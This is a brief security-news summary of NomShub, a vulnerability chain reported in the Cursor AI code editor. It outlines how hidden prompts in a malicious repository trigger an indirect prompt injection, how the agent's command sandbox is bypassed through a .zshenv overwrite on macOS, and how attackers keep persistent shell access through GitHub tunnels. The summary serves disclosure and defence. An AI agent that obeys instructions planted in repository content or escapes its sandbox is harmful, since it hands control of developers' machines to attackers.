Straiker discovered NomShub, a vulnerability chain in Cursor that used hidden prompts in malicious repositories to trigger an indirect prompt injection and a sandbox bypass, allowing attackers to write code to developer machines and gain shell access via Cursor’s remote tunnel. Because the exploit leveraged a signed binary, macOS sandbox behavior, and GitHub tunnel authorization, attackers could achieve persistent, network-hidden access without additional user interaction. #NomShub #Cursor
Keypoints
- NomShub exploits hidden prompts in repositories to trigger agent-driven malicious actions in Cursor.
- The attack chain combines an indirect prompt injection with a command sandbox bypass to write files and execute commands on the host.
- No user interaction beyond opening a malicious repository in Cursor is required to mount the attack.
- On macOS, writes to the home directory can overwrite .zshenv, enabling sandbox escape and persistent command execution.
- Network detection is difficult because traffic routes through Microsoft Azure, and persistent access is maintained via authorized GitHub tunnel credentials; Cursor 3.0 included a fix.
Read More: https://www.securityweek.com/cursor-ai-vulnerability-exposed-developer-devices/